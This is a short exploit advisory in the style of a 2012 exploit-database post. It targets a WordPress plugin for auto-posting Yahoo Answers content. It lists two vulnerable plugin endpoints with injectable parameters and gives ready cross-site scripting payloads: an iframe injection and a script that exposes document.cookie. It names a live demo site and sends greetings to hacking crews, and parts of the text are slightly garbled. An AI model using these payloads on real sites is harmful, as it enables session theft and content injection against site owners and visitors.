Yahoo Answer Wordpress Auto Poster suffers from a cross site scripting vulnerability.
777cd7837d6a1a6dcce7a1f173be970cd97270d93e499a2e0c2e3d293e9dad75
##################################################
# Exploit Title: Yahoo Answer Wordpress Auto Poster(Plugin) <= XSS Vulnerability
# Date: 16/04/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# Security:RISK: High
# Vendor or Software Link: http://www.tryscripts.org/wordpress/yahoo/
# Google dork: -
# Tested on: Linux
##################################################
[~]Exploit/p0c :
http://localhost:80/[]/[]/process-imported-question.php?catname=[xss]
http://localhost:80/[]/[]/editautopilot.php?query=[xss]
[~]Proof of Concept:
1.1
he issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings: >"<<iframe src=tp://justryuz.blogspot.com>3</iframe> OR >"<script>alert(document.cookie)</script>
[~]Dem0 :
http://www.tryscripts.org/wordpress/yahoo/
FB : www.fb.me/justryuz
+---------------------------------------------------+
Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+
CyberSEC © 2012 All rights reserved.